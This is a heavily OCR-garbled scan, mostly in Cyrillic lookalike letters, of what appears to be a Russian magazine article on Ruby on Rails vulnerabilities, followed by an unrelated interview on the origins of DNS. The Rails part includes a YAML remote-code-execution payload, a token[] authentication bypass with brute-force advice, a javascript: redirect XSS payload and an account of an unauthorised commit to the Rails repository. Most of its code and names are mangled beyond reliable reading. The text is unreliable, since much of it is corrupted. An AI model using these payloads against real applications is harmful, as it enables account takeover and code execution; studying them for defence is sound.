Но не все так радужно, как представляется на первый взгляд: 
существует как минимум две распространенных ситуации, в ко- 
торых наличие данной защиты становится бесполезным. 

О первой говорить даже стыдно: многие просто выключа- 
ют ее. Так, например, рекомендуют многие в своих ответах 
на Зіаск ОѵегНоѵѵ. Это связано с тем, что большинство веб- 
мастеров вообще не знают, что представляет собой СЗЯР 
и зачем от этого нужно защищаться. В результате, когда от- 
дельные разработчики начинают жаловаться на ответы серве- 
ра РогЫбсІеп, они получают соответствующие советы от таких 
же «специалистов»: использовать «зкір_Ье^оге_'ПІ1:ег :ѵегіб/_ 

Атака С5КР — одна из любимых 
тем моих исследований . Я считаю, 
что С5КГ — уязвимость в НТТР 
и браузерах, а не в веб-приложениях 



аЩЬепІісіІуІокеп». Эта конструкция говорит о том, что про- 
верку токена сзгМокеп необходимо отключить. 

Вторая ситуация интересна тем, что она актуаль- 
на и для других платформ. Я называю эту проблему «ѲЕТ 
АссеззіЫе Асбопз» — это такая ситуация, в которой по задумке 
разработчика запрос должен осуществляться с использовани- 
ем метода РОЗТ и с токеном, но на деле фреймворк спокойно 
принимает метод СЕТ и пропускает проверку токена. В случае 
ЯоВ проблема заключается в использовании метода таісб 
в файле гоШез.гЬ, описывающем систему обработки путей 
на сайте. Данный метод предназначен для маппинга опреде- 
ленного действия сразу на все доступные методы НТТР: ѲЕТ, 
РОЗТ, РАТОН, ОЕІ-ЕТЕ и так далее. Метод таісб используется 
повсеместно, поэтому при анализе защищенности приложе- 
ния ЯоЯ всегда пробуй передавать параметры через альтерна- 
тивные НТТР-методы (в самом простом случае — ѲЕТ) и следи 
за реакцией сервера. Следующее выражение является класси- 
ческой иллюстрацией описываемого случая: 

таЬсй "/Тоііоы 1 ^ Ьо: "То11оыіп§з#сгеа1:е" 

Именно благодаря наличию такого выражения и использо- 
ванию обычного тега <іплд згс-зіІе/1юІІоѵ\/?изеМб-туісі> я полу- 
чил сотни фолловеров на сайтах Ібгтзргіпд.те, зІісіезИаге.пеІ:, 
ЬіІЬискеіогд и других. 

Хотел бы отметить, что в четвертой версии Ваііз было запре- 
щено использование метода таісб без параметра «:ѵіа». Теперь, 
если ты хочешь, как и раньше, не ограничивать перечень исполь- 
зуемых НТТР-методов, тебе нужно передать аргумент «ѵіа: :аІІ». 

Рекомендация: независимо от платформы твоего сайта 
всегда четко разграничивай все действия на РОЗТ, как изменя- 
ющий информацию запрос (с проверкой токена), и ѲЕТ, как за- 
прос на получение информации (без токена). 




Х88 

Очень полезна реализованная в ВиЬу оп Яаііз защита от Х83 
при помощи экранирования потенциально опасных символов, 
включенная по умолчанию. Каждая строка (класс Зігіпд) поме- 
чается специальным флагом ЫтІзаТе. При этом если данный 
флаг отсутствует, то перед выводом переменной Яаііз осуще- 
ствит ее фильтрацию. 

Для вывода безопасных данных принято использовать кон- 
струкцию <%=гаѵѵ ба1:а%>, а для всех остальных (например, зна- 
чений, которые могут быть модифицированы пользователем) — 
<%- баіа %>. Метод гаш помечает строку флагом ІлІтІ_заІе: 

гіе-Р гам(зі г1 п§І5 в ) 

б'Ьгіп&ібіі .±о_5 . ИЬтІ^заТе 
епб 



Поэтому многие рубисты привыкли к наличию фильтров 
ХЗЗ, используемых по умолчанию. Однако хороший специалист 
по информационной безопасности понимает, что ХЗЗ — это 
комплексная атака, которая может принимать различную фор- 
му и проводиться в несколько этапов (например, происходить 
после осуществления пользователем каких-либо действий или 
запуска событий, то есть в рантайме). 



Проблема возникает тогда, когда разработчикам необхо- 
димо вставить данные в формате 05СЖ в возвращаемую поль- 
зователю страницу. Обычно для этого используют выражение 
<%=баШ.1о^оп%> или для варианта с языком разметки ЬатІ; 

пауазсгі-рі 

ѵаг сіаііа = #{баі:а ._1:о_ззоп_} 

В первом случае используется конструкция <% — то есть 
стандартная фильтрация будет применена. Во втором случае 
иЗОІЧ, который может содержать НТМ1_-код, не будет очищен. 
Уязвимость исправлена 8 четвертой версии Яаііз, в ней симво- 
лы <>& заменяются на их Ыпісосіе-аналоги. 

Рекомендация: не вставлять в іпііпе иаѵаЗсгірі небезопас- 
ные данные и вообще не использовать іпііпе іаѵазсгірі: / СЗЗ. 
Альтернативой может быть такой метатег: 

<теЬа пате="5іагЕ_гіа , Еа" <-■ 
сопЬеп1: ="{\" пате\" : \ ,, Ерог \ ,, }' | > . 

Это может выглядеть неэффективно, зато семантично 
и безопасно с точки зрения взаимодействия данные — код, об- 
рабатывающий данные. 
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МА55А88ІСЫМЕЫТ 

Согласно конвенции НиЬу оп Наііз, параметры передаются 
в виде хеша: изег[изегпате], изег[зесопсІпате], и уже в кон- 
троллере этот хеш переходит в модель — изег.ирсІаІеаІІгіЬиІез 
рагатз[:изег]. При этом, если подкидывать в хеш значения 
других полей таблицы, которые изначально нам не разрешено 
менять, становится возможным обновить и их вместе с осталь- 
ными. Например, изменить Іогеідп кеуз и назначить сущности 
другого владельца (изег ісі). 

Известная защита от такого поведения НиЬу оп Наііз — ис- 
пользовать аііг ассеззіЫе: при создании модели разработчик 
обязан описать, что именно можно обновлять посредством 
тазз аззідптепі, а что — нельзя. Фактически же такими ме- 
тодами пользуются только настоящие джедаи, то есть те 
разработчики, которые не только помнят об этой защите, 
но и не ленятся описывать вручную соответствующие параме- 
тры. Основным препятствием к безопасной разработке с ис- 
пользованием данных методов оказывается то, что никто и ни- 
что (даже генераторы моделей) не напоминает разработчику 
о необходимости их применять. 

Особенно пагубно тазз аззідптепі влияет на Іогеідп кеуз, 
в ситуации, когда один объект можно переназначить другому. 
Чтобы защиту включили по умолчанию, я активно агитировал 
разработчиков в тикете #5228 на основной странице Наііз ( ЫІ. 
Іу /усІМВСВ ), однако моей идеей мало кто вдохновился. 

Параллельно с агитацией я занимался тестированием 
самого гитхаба, и это принесло свои плоды, так как защита 
от тазз аззідптепі в проекте отсутствовала. Первый при- 
мер (его можно применить для множества других сайтов) — 
обновление дефолтных полей ирсіаІесІ_аІ/сгеаІесІ_аІ. Тикет 
из 3012 года до сих пор стоит первым в выдаче при сортировке 
по полю ВиЬтіІІесІ. 

Вторым примером стала смена значения риЫіс_кеу[изег_ісі] 
моего ключа на Ю пользователя Наііз и последующий коммит 
в гаііз/гаііз — репозиторий Наііз, хранящийся на ѲіІНиЬ, напи- 
санном на Наііз. 

Нельзя назвать мой наглый поступок ответственным, хоть 
я и уведомил администрацию о похожих уязвимостях еще 
за три дня до этого. Вместо полного аудита кода на наличие 
тазз аззідптепі они запатчили лишь частные случаи, поэто- 
му я был вынужден поступить не по ѵі/ііііеііаі’еки. Это принес- 
ло свои плоды — спустя пять часов после коммита Наііз Соге 
Теат сделала \л/МіІеІізІ_аНгіЬиІез обязательным по умолчанию 




(заставляет прописывать аІІгассеззіЫе в моделях), а также 
добавила атрибут аНг_ассеззіЫе в генераторы. Вероятно, это 
было сделано под воздействием общественного мнения — 
о том коммите написали многие сайты. 

В Наііз 4 вместо старой защиты в модели будет использо- 
ваться гем зігопдрагатеіегз для фильтрации ключей тем же 
способом, но в контроллере. Этот способ выглядит более ло- 
гичным, так как контроллер является первым рубежом обороны 
от ошибок, связанных с некорректной обработкой данных, по- 
ступающих от пользователя. 

Рекомендация: всегда использовать ѵѵМІеіізІ и делать 
защиту включенной по умолчанию, не надеясь на самих поль- 
зователей. 



+ Ьаскей 
[і^І Ьаск е сі 

... I ... [06 - 0,0 + 1,3 ѲѲ 

1 +апоі^іег зііоюсазе оЕ гаііз аррз ѵипІегаЬіІіЕу. 

2 +СіШдЪ рцпесі. адаіп : ( 

3 +ЮІ11 уои рау те Еог зесигіЕу аийіЕ? 

Последствия ком плита в репозиторий гаііз/гаіів 

І Я занимался тестированием гитха- 
ба, ведь защита от тазз аззідптепі 
в проекте отсутствовала 



442 о;>еп І55У65 8,831 сіозегі І5$ие$ 



^ ЗиЫп ІНей Іірйаіей Сопл теп Іа 



123456789 294 295 N6X1» 



#5239 1'т Вепдег ігот Риіиге, 

Ьу ^огіакоѵ Ъ 1000 уеагз 40 сот гп опія 

• #9273 Ведгевдіоп жі№ йе!аиК1>соре алгі Раіів 3.2.9 

Ьу 9 адо 4^ 5 соттепій 

• #9272 Ыеш 3.2 геіеаае ѵ/іИі Ііх Іог #8460? 

Ьу І'ашаше 14 Ьоуге ада 4^ 1 соттвпі 



Тикет из будущего на СіЖиЬ 




зоигиБстіоы 

Хотя ОПМ-рельс в большинстве случаев экранирует входные 
параметры, есть такие служебные методы, которые подраз- 
умевают передачу только безопасных параметров. Например, 
ОгсІег.ѵѵІіеге{:и 5 ег_ісІ => 1 ).]оіпз(рагатз[:ІаЫе]) — параметр ІаЫе 
никак не будет очищен, да и джойнить произвольную таблицу — 
изначально плохая идея. 

Рекомендация: для полного списка таких опасных ме- 
тодов советую посмотреть сайт гаііз- заІКога и убедиться, 
что для создания 50І_і в рельс-приложении надо иметь руки не- 



много не из того места. 





СОѴЕЙЗТОЙѴ 
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СЕССИИ 

В ВоВ сессии хранятся по умолчанию в зідпесі соокіе, пред- 
ставляющей собой обычную строку, подписанную секретным 
ключом НМАС. Многие разработчики полагают, что поль- 
зовательская сессия — это что-то по умолчанию безопас- 
ное и недосягаемое для пользователя. Да, пользователь 
не может модифицировать значения параметров сессии, 
так как она подписана сессионным ключом приложения — 
зеззіоп зесгеі, зато он может прочитать все, что записано 
в сессии (например, значения изег ісі, ассеззіокеп или 
раііііозесгеііііе). Вот так, например, выглядит дб зезз 
соокіе на дкІиіЬ.сот: 



ВАИ700о( 2Х2М2С . . . А(Ю§рАсМ\І12Н5А- 

сИ2Ь0'Р42есІ9881‘РЬѵ55сс9559сІ50асіи'Р5'Р5б38сі2 



Данное значение состоит из двух частей: первая часть 
значения представляет собой строку, закодированную по ал- 
горитму Вазе64, вторая часть — ее М05-подпись. Попробу- 
ем декодировать первую часть строки при помощи функции 
а1оЬ(сіесосІѳивІСотропеп1()) и получим следующее значение: 



" { :_С 5Г-р_1:океп''19уѵЗѴ2Ѵ8ѵеССдХу53с!147ХСВ9г4г2ЫѴи№^_ 
2дЦГд5тІлШ= : зеззіоп і<Г%76-Р70іЬѲ9аіЬ5а1831а51а309<-‘ 
•р-Р8-Р79сІ.:_ изег іез :соп~Еех1:І ' / : ЕР :йп§ е гргіпі "%5-Р-Ре 
-р0 1-Р27д79Ь4-Р- Р 0с1Ьеаа395в8еЬ7 : г еі игп -ЬоІ'Ч Ь Пра: //<-■ 
р ііНиЬ . сот/5е ііі п%з/ргой 1е : ТІ" 

Р1азЬ;_ РІС: ' АсііопСопігоІІег : : РІ азРі : : РХазИНазИ^ : 
@изед{" 

Собственно говоря, ничего, кроме раскрытия данных, этот 
баг не несет. В Ваііз 4 для хранения сессий уже использует- 
ся епсгуріесі зеззіоп зіогаде, что существенно ограничива- 
ет возможность получения полезных данных из сессии, так 
как она хранится в зашифрованном виде. 

Рекомендация: лучше не хранить ничего на стороне кли- 
ента, а в качестве зеззіоп Ю использовать неугадываемую стро- 
ку, соответствующую строчке в базе данных, для этого есть гем 
асііѵегесогсі -зеззіоп зіоге. 




ТО_5ѴМ 

ЗутЬоІ — это особый тип данных в ВиЬу, являющийся, по сути, 
константой, при этом сами символы никогда не удаляются 
сборщиком мусора. Поэтому, если приложение создает сим- 
волы на основании контролируемых пользователем данных и 
при этом указать длинные последовательности случайных букв/ 
цифр, возможен отказ в обслуживании. Основной задачей в 
этом случае становится поиск места, в котором пользователь- 
ский ввод приводится к типу зутЬоі. 

Хотя со временем код рельс «очистили» от символизации, 
однако до сих пор некоторые разработчики злоупотребляют 
этим в своих приложениях и контроллерах. Очень часто встреча- 
ется, например: І18п.Іосаіез.іпсІисІе?{рагатз[:ІосаІе].1:о_зут)— 
разработчик только что привел параметр Іосаіе к символу (а он 
может быть очень длинным), забив тем самым память. 



т арр 
т _і аззеіз 
* Ш (гладей 
}аѵа5сгіріз 

► Ев муІезНееі* 

* Л сопігоііегь 

► Щ Ьеірегз 

► Ш гпаііегз 

► Ш тойеІ5 

► 1_ ѵіеѵу$ 
т /Іі сопЯд 

аррІісаііоп.гЬ 
гь ЬоосгЬ 
I сІаіаЬазе.утІ 
и- епѵІгоптепыЬ 

► Ш епѵігоптелиь 

► _і іпШаІігегз 

► С ккаіеь 

■ь гоигез.гЬ 
соетйд.ги 

► въ 

► _і сірс 



І Сегпіііе 



► СД Іі Ь 

► Іод 

► рцЫіс 



Дефолтная структура свежесозда иного проекта 



Я, например, находил возможность БоЗ в Васк (единый 
интерфейс для большинства веб-фреймворков на ВиЬу), кото- 
рый приводил к символу часть заголовка АиШогігаІіоп (:Ьазіс, 
:сІіде5І, :ЫаііЫаІіѵегуІопд}: 



бе+ раг1:5 



(Эрагіз 


11= {йепѵГаиіИогігаііоп кеуі . 5р1і1:( ‘ 2) 


епсі 


(ЭзсЬете | 


|= рагіз .-(ІГ5І: .сіомпсазе .іо зут 



Рекомендация: не приводить к символам пользователь- 
ский контент. 




НЕМОТЕ СООЕ ЕХЕСІІТІОЫ 

Первая информация об уязвимостях данного типа появилась в 
январе 2013 года. В течение месяца в рельсах было найдено три 
уязвимости, позволяющие выполнять произвольный код. Давай 
рассмотрим причины существования таких уязвимостей. 

Исторически сложилось так, что рельсы обрабатывали па- 
раметры, представленные в различных форматах: игіепеосіесі 
(обычные формы), ЗЗОМ и даже ХМІ. Кроме того, ХМ1_ мог со- 
держать внутри себя ноду, представленную в формате ѴАМІ_, 
например: 

кех ріоіі: іуре="ѵатІГ ' > — </ ехр1 оі1: > 

Кроме того, ѴАМ!_ мог инстанцировать (по сути, вызывать 
ОЬіесІ.пеѵѵ) любые классы в атакуемой системе, а потом назна- 
чать свойства через метод [] (доступ к элементу массива). 

В конце концов исследователи нашли такие классы в систе- 
ме, которые приводили к выполнению кода в результате обра- 
ботки поступающих от пользователя произвольных данных. На 
момент публикации информации об этой уязвимости ей были 
подвержены все сайты на ВоВ (необходимо отметить, что в чет- 
вертой версии Ваііз отключена обработка ХМІ_-параметров по 
умолчанию). Рабочий эксплойт для данной уязвимости выгля- 
дит следующим образом: 



— ! гиЬу/Иазіі : АсііопСопігоІІег : : Коиііпе: : / 
КоиіеЗеі: :№атесіІКои1:еСо11ес1:іоп 
? #{епсос(ес(_рау1оасі} 

: і гиЬѵ/зі гисІ: 

сІеіаиІіБ : 

:ас±іоп : сгеаііе 

: сопіго11ег2_ -Рооб 

гедиігесі рагіз : П 

гедиігетепііз : 

:асііоп : сгеаііе 

: с оп'ЕгоІ Іег : "Рооб 

5е§теп1:_І<еу5 

- : -Роптав 



Дальше — больше, и по похожей схеме. Оказалось, что ЗЗОМ. 
рагзе вызывает внутри себя метод ЗЗОІМ.Іоасі, а ОЗОШоай под- 
держивает инстанцирование «|50п_сгеа1аЫе?» классов. В рельсах 
было достаточно таких «ізопсгеаІаЫе?» классов, чтобы довести 
это до удаленного выполнения произвольного кода. Хоть в пабли- 
ке я эксплойта до сих пор не видел, Бен Мерфи (Веп Мигрііу), на- 
шедший этот баг, гарантировал мне, что у него есть рабочий ВСЕ. 

Рекомендация: не использовать ѴАМІ_ и ЗЗОШоасІ для 
парсинга пользовательского инпута. 
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ШТЕСЕП8 И ВПІІТЕ РОКСЕ 




Первым багом, связанным с типами параметров, был піі. Дело в том, что Паск 
парсит параметры таким образом, что ?ѵаг дает рагатз[:ѵаг]=-піІ, а значит, 
?ѵаг[] дает массив [піі]. При этом многие разработчики часто проверяют на- 
личие токена при восстановлении пароля следующим образом: 



іі_ рагат5 [ : Ііркеп ] 

Іізег . , ІіпсІ_Ьу_'1:океп р ага т з [ :іо кеп] 
епсі 



Если передать ?1океп[] в адресной строке, то іГ рагатз [:1океп] прой- 
дет проверку, а ОПМ вернет первую же запись с пользователем, у которого 
поле Іокеп не задано (пустое). Такая ошибка была найдена мною в системе 
электронной коммерции Зргее. Используя ссылку вида ІШр://ехатрІе.сот/ 
арі?арі_кеу[], можно было делать АРІ-запросы от лица суперадмина, так 
как по умолчанию арі_кеу получался пустой . 

Спустя несколько недель после обнаружения описанной проблемы ис- 
следователи обратили внимание на то, как Му501_ осуществляет сравнение 
строк с числами. 

В частности, выражение «гапсІот_Шкеп» = 0 вернет логическое значение 
Ігие, так как будет осуществлено приведение типа строки к нулю. При этом 
возникает вопрос — как можно передать в приложение значение нуль? От- 
вет прост — используй 15014 (например, объект {"1океп":0}), и вот ты уже 
меняешь кому-то пароль! После обнаружения этой особенности авторы 
фреймворка отказывались что-либо менять, но после публикации деталей 
уязвимости и под воздействием общественного мнения разработчики реши- 
ли исправить данное поведение, приведя типы полей к тому, что от них ожи- 
дается в схеме базы, — строки к строкам, числа к числам. 

Рекомендация: можно использовать баг в стиле ЬгиІе-'Гогсе — вместо 
?1океп=123 отсылай РОЗТЬосІу с содержанием !океп[]=1&1океп[]=2,.., что по- 
зволиттебе за раз проверять более 10 тысяч вариантов. 




ЗАКЛЮЧЕНИЕ 

Да, в РІаіІз выявлено много серьезных проблем. Но это говорит в первую очередь о росте фреймворка, 
а также о том, что Паііз в процессе своего развития заставляет обычных разработчиков задумываться 
о безопасности их кода. 

В блогосфере четко прослеживается усилившийся интерес к безопасности. Многие начали писать 
книги с названиями типа ВиЬу Зесигііу, некоторые создают онлайн-сканеры, остальные работают над 
Вгакетап (статический анализатор кода для РІаіІз). Также есть Зесигііу Мопііог от создателя Сосіе СПта^е, 
который делает похожую работу, но «в облаке» и, разумеется, платный — 74 доллара в месяц (поэтому 
в годовой перспективе лучше нанять, например, меня :)). Прогресс определенно есть, и многие шутят, 
что если раньше рубисты были «одержимы» тестированием, то сейчас это место заняла безопасность. 

Резюмируя сказанное, я могу с уверенностью утверждать, что из всех известных мне фреймворков, 
используемых для веб-разработки, НиЬу оп РІаіІз обеспечивает на данный момент самый высокий уро- 
вень безопасности по умолчанию, не мешая при этом самому процессу разработки. Рекомендую! НС 
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РозаіЫе ипрго-Ьесіееі гейігесі псаг ііпе 25: 
г ейігес Ьо ( рагатз [ :геіДігесі_ , Ьо'] ) 

]эоп дет ѵегеіоп 1*7,6 Ъаэ а гето-Ье ѵиІпегаЫі-Ьу : ирдгасіе -іо 1,7,7 

Зезвіоп веегеі зДоиІсі поі Ье іпеіисіесі іп ѵегаіоп сопігоі пеаг Ііпе 7 

РоээіЫе соттапсі іі^есГіоп пеаг Ііпе 51: "іэіі-кеудеп — 1 1Ё # 
{ТетрЕіІе.пемГ "кеу Еііе" } ,ра±к} 2>&1" 

Йаііа 3.2,11 Ііаз а (іепіаі оИ зегѵіее ѵиІпегаЫІііу іп Асііѵе&есогеіі 
ирдгасіе Ъо 3*2*13 о г раісѣ. 

Рагатегег ѵаіие иѳеД іп Еііе пате пеаг Ііпе 34: 

зепеі Еі1е( рго^есі _ гереаііогу . агсбіѵе геро ( рагатз | : геі . . , 
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ііпййЕс рагагг.е^ег ѵаіие іп 1іпк_Ю кгеЕ пеаг Ііпе 14: 1іпк_ Ро ( " Еета-ѵе 11 , 
сиггеп*._ ивег . кеуз . ЕіпсЗ ( раг аіг.з [ * * * 

Ппезсарей тосіеі аЪГгіЬиГе пеаг Ііпе 30: 

Еіпгі_апсЗ__ргееегѵе ( наті : : : : сгаѵаасгірг , геп^ег„ѵі^Ь. рр^іо, , , 
Опезсарей рагагг.еРег ѵаіие пеаг Ііпе 2: 

Е1пй_апй_ргезегуе ( Наші : : ЕіІЪегз : : ^ѵазегірѣ - гепсіег_ѵігЬ_орііоп . . * 
Упезеарегі тосіеі аг.ЪгіЬиГе пеаг Ііпе 2Й: 

Еіпй апгі ргеаегѵе ( Наті ; : Еіі^еге : : іТаѵазсг іріь . гепйег_ ѵі1:Ь_орРіо . , . 
УпевсапеО рагаіг.еѣег ѵаіие пеаг Ііпе 37і 

ЕіпсЗ_апсЗ_ргезегѵе ( Наті : : ЕіІЪегз : : ^ѵазегірі . гепсіег_'н , ііЬ_ орЪіо . . . 

Еепсіег ра^Ь соп^аіпе рагате^ег ѵаіие пеаг Ііпе 24: гепгіег ( аеъіоп => 

Негде Кедиез^зАоасЗсопИехі.пеѵ(ргоі .. . 

КепОег раЫі соп^аіпз рагаіг.еГег ѵаіие пеаг Ііпе 22: гепсЗег ( асЬіоп => сазе 
рагатз[:^] ѵЬеп "а 11 4 ГЬеп . ** 



Результат работы сканера Вгакетап 




ГИБКОСТЬ 
РАИ$ АРІ 

В четвертую версию Наііэ был внесен ряд 
приятных изменений, связанных с без- 
опасностью. Например, в ответ сервера 
по умолчанию добавлен НТТР-заголовок 
«Х-Ргате-Орйопз: ВАМЕОВІСІЫ» для пре- 
дотвращения сііскіаскіпд -атаки. 

Тем не менее есть в философии Ваііз 
одна деталь, от которой нельзя так быстро 
избавиться, — гибкость. Ваііз — это такой 
швейцарский ножик, и, к сожалению, мно- 
гие разработчики не до конца понимают, 
как все работает изнутри и какие «секреты» 
хранит этот фреймворк. Приведу пару при- 
меров, как гибкость может пагубно влиять 
на безопасность. 

Допустим, есть метод гесІігесМо, 
который может принимать либо строчку, 
либо замыкание, либо символ :Ьаск, либо 
объект ОВМ, либо хеш с опциями. Выраже- 
ние гебігесОо рагатз [:1о] подразумевает, 
что пользователь будет перенаправлен 
на путь из параметра «Іо». Стоп, а что, если 
мы подкинем вместо обычной строки хеш 
«?Ш[5Іа1из]=200&Іо[рго*осоІНаѵа5сгір1::аІе 
г1(0)//», что эквивалентно гесІігесЦо зШШз: 
200, ргоіосоі: 'іаѵазсгірІ:аІеП(0)//'. В резуль- 
тате ответ сервера будет: 

<1ііт1> 

<Ьосіу>Уои аге Ьеіп§ 

<а Ьге~Р="іаѵа5сгірі :а1егі(Ѳ) /А-і 
Н05Т/ " >гесіігес1:есІ</а> 

</ІЬосІу> 

< /Иііті > 

настойчиво предлагающий пользователю 
нажать на Х$8-ссылку. 

Все рельс-сайты принимают в теле 
запроса 38СЖ, и это значит, что вместо 
любой строчки ты можешь послать любую 
структуру хешей и массивов. Очеред- 
ной пример — при создании записи 
с помощью Розісгеа1:е(рагатз[:розЧ) 
можно положить в «розі» несколько со- 
тен/тысяч объектов класса Розі, попро- 
сту говоря — спамить. При этом вместо 
ожидаемого {"розГ :{"М1е" : "ТШе 1"}} 
придет ("розГ: [{”ШІе , ': , ТіІІе 1"},{"1і1Іе":"ТШе 
2"},ГШ1е":’ТШеЗ"}...]}. 

Аналогичная ситуация и с етаіі- 
рассылками! Попробуй послать в теле 
запроса етаі![]-ѵазуа@дтаі1.сот& 
етаіІ[]=Іепа@дтаіІ.сот&етаіІ[]=зазба@ 
дгау.сот&.., и ты заставишь сервер делать 
рассылку своего письма по всем этим 
адресам. Как видишь, гибкость сильно 
увеличивает поверхность атаки, а у Паііз 
очень гибкий АРІ. 

Рекомендация: использовать !о_з/. 
Іо_і (приводить к строчкам/числам} там, 
где Ваііз АРІ может повести себя непред- 
сказуемо. 
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«Доменные имена знают все, а моего имени не знает никто», — грустно 
пошутил мой собеседник. Действительно, 0М5 кажется такой утилитар- 
ной и привычной вещью, что никому и в голову не приходит задаться во- 
просом о том, как все это создавалось и кто за этим стоит. 



ДО РЫЗ И ИНТЕРНЕТА 

Часто со мной говорят так, будто интернет застыл и больше 
никто ничего не делает. Это не так. Еще многое предстоит 
сделать, но давайте поговорим об эпохе «динозавров». 

Возможно, начало 1980-х и есть то, что люди называют 
«освоением интернета». 

В то время интернет был АВРАЫЕТ’ом, и до появления 0№ 
адреса хостов хранились следующим образом: существова- 
ла таблица, которой управляла организация под названи- 
ем ЗПІ (в последствии подарившую миру Зігі). Если вам 
требовалось занять домен, вы звонили им и говорили: 
«Привет, можно я возьму вот это имя? Вы можете присво- 
ить ему этот адрес?» И они могли дать вам имя. 

Если возникала проблема, то не существовало механизма, 
позволявшего ее решить, к примеру, ночью. Нужно было зво- 
нить в ЗПІ, а те закрывались в пять часов вечера. 

Невозможно было получить новый адрес хоста в шесть 
часов вечера или на Рождество. Поэтому требовалось ре- 
шение, при котором регистрация доменов происходила 



децентрализовано, автономно, но все это по-прежнему 
оставалось бы единой системой. Каждый элемент этой 
системы должен был иметь возможность взаимодейство- 
вать со всеми остальными. 

Дистрибуция тоже была крайне важна, ведь она позволяла 
системе ни от чего не зависеть. Те, кому требовалось бы- 
стро развернуть и настроить свою сеть, получили такую 
возможность. Не было центральной единицы (организа- 
ции), вынуждающей участников процесса стоять в очере- 
ди и ждать, чтобы сделать что-либо. 

Представлял ли я, как именно будет использоваться эта 
система? Конечно, нет. Если бы я мог понять все варианты 
использования, она не была бы универсальной. 

□N8, по сути, система доставки. Ведь вам не нужна си- 
стема, которая способна доставлять только квадратные 
предметы или же только круглые, — никому не хочется за- 
бивать свою голову такими вещами. Существует лишь точ- 
ное ограничение размера. Так, в грузовик можно уместить 
ровно столько, сколько в нем есть места, а в РЫЗ вместить 
все, для чего хватает объема данных. 
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0№ довольно мощная штука. В основе лежит простая идея, 
к которой люди могут добавить что-то свое. 

Я создал изначально универсальную систему, позволяющую 
хранить любые данные, вместо того чтобы создавать узкоза- 
точенное решение для хранения адресов хостов или только 
адресов маршрутизаторов. 

За прошедшие годы люди многое добавили в систему ЭМ8. 

Реально работало меньше половины из этих добавлений, зато 
эта половина оказалась очень значимой. 

ИДЕЯ 

Как появился ОМЗ? Проектом руководил Джон Пастел. В про- 
шлом я уже работал под его началом. Однажды он пришел 
ко мне в офис и сказал: «Почему бы тебе не поработать над 
этой проблемой? Есть пять вариантов ее решения». 

Итак, существовало пять уже придуманных вариантов решения 
проблемы. Я изучил их и понял, что ни один мне не нравится. 
Я должен был найти компромисс между ними. 

В итоге я просто создал свое решение, и никто этого не за- 
метил, пока не стало слишком поздно. 

Идея пришла из моего прежнего опыта. Когда я учился в Мас- 
сачусетском технологическом институте, я сотрудничал с Ни- 
коласом Негропонте. Сейчас он всем известен по проекту Опе 
1_ар1:ор Рег СЫІсІ, разрабатывающему образовательные ком- 
пьютеры для детей в бедных странах. Но тогда он еще не был 
такой крупной фигурой. 

В МП я понял, как заставить несколько компьютеров работать 
вместе. То, что сейчас назвали бы облачной вычислительной 
системой. Несколько компьютеров, связанные между собой 
с помощью дополнительного оборудования, выполняли за- 
дачу, предназначенную для большего компьютера. Это и при- 
вело меня к идее распределенной системы из нескольких 
ресурсов. В таких системах часто нарушалась работа одного 
из компьютеров, и нам приходилось решать возникавшие про- 
блемы. Этот проект на меня заметно повлиял. 

Также я работал в Калифорнийском университете с Дейвом 
Фарбером над распределенной вычислительной системой, ко- 
торая объединяла два разных компьютера по сети. Уже тогда 
сообщения отправлялись не на адрес машины, а на ее имя. 

Словом, у меня уже были идеи по поводу присваивания имен 
в распределенных системах. 

В университете я создал ОС для хранения файлов на основе 
распределенных машин, и мы сделали так, чтобы каждое имя 
файла состояло из двух больших частей: название папки и на- 
звание самого файла. Это оказалось ошибкой, ведь при такой 
записи нельзя было создавать, например, подпапки. В резуль- 
тате я понял, что двух уровней мало, ограничивать их количе- 
ство в принципе нельзя. В ЭМЗ везде лимитирована длина 
имени, но можно создать столько уровней, сколько войдет 
в этот огромный лимит. 
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«В итоге я просто соз- 
дал свое решение, и 
никто этого не заметил, 
пока не стало слишком 
поздно» 



Многие считают, что мои идеи основаны на тех системах записи 
имен, которые уже существовали. Но многое все-таки основыва- 
лось на моем личном опыте. Скажем, у Хегох в то время была 
очень мощная система присваивания имен, но у нее было 
три уровня, фиксированно. Это ошибка, которую я совершил 
раньше и не хочу повторять. 

Еще одна важная идея РИЗ: всегда нужно иметь резервные 
серверы. Если один не сработает, остальные будут продолжать 
выполнять свою задачу. Прежние интернет- протоколы работа- 
ли так: если что-то не получалось, они просто пытались снова 
ненова, пока не добивались ответа. Но если хост упал или зда- 
ние, в котором хост находится, разрушилось при внезапном 
землетрясении, тогда такой подход не сработает. А вам все 
равно нужно, чтобы сервисы продолжали работать, несмо- 
тря на поломку одного из элементов. Думаю, ЭМ 8 был одним 
из первых воплощений этой философии. 

Также вам, конечно, знаком почтовый протокол ЗМТР {Зітріе 
МаіІ ТгапзТег Ргоіосоі). Благодаря мне в его названии появилась 
буква 5: зітріе. До окончания университета я работал над по- 
чтовым протоколом. Он тогда назывался МТР, был очень слож- 
ным и завязанным на РТР. Я решил, что нужно выкинуть все 
лишнее, и он превратился в простой почтовый протокол. 

Дело в том, что я убежден: создавая что-либо, ты должен сде- 
лать это простым и понятным. Можно создавать вещи, которых 
сам не понимаешь, но это все равно, что обезьяне печатать 
на машинке. Занимает много времени, а на выходе будет куча 
ошибок. Важно суметь создать дизайн, понятный не только 
для автора, но и для пользователя. 

Поэтому я пытался объяснить первоначальный НРС. Пытался 
простейшим образом объяснить БИВ, считая, что другим лю- 
дям важно понять его и использовать на других машинах. Те- 
перь он, конечно, стал сложнее, но основные идеи были мак- 
симально просты. 

Я часто говорю, что похож на здание. Я заложил фунда- 
мент и построил первые два этажа. Другие люди продолжили 
мою работу и построили следующие 20-30 этажей. 

Если вы обратите внимание на НРС, я написал около ста стра- 
ниц НРС, которые стали основой. Не знаю, сколько тысяч стра- 
ниц я написал после, описывая различные решения на базе 
ЭІЧЗ и так далее (НРС — РІециезТ Рог Соттепіз, манифест, 
описывающий тот или иной интернет-стандарт. — Прим. ред.). 



РАЗРАБОТКА 




Первый НРС я опубликовал в 1983 году. В 1982 году я окончил 
университет. До этого я написал кучу ВЕС, но там не указыва- 
лось мое имя, поскольку я еще учился. Так часто бывает в уни- 
верситетах. Так что в 1983 году мое имя впервые появилось 
под РіРС. 

Я начал думать об этом еще в 1982 году. Была пара набросков, 
созданных до публикации НРС. Но первый НРС вышел в 1983-м. 
Если прочете его, заметите сходство с нынешним ОІЧЗ. Мы 
установили его на нескольких различных машинах и многое 
поняли, поэтому современные реализации ближе к тому, 
что было опубликовано уже в 1986-м. 

На все ушло около трех лет экспериментов. По сегодняшним 
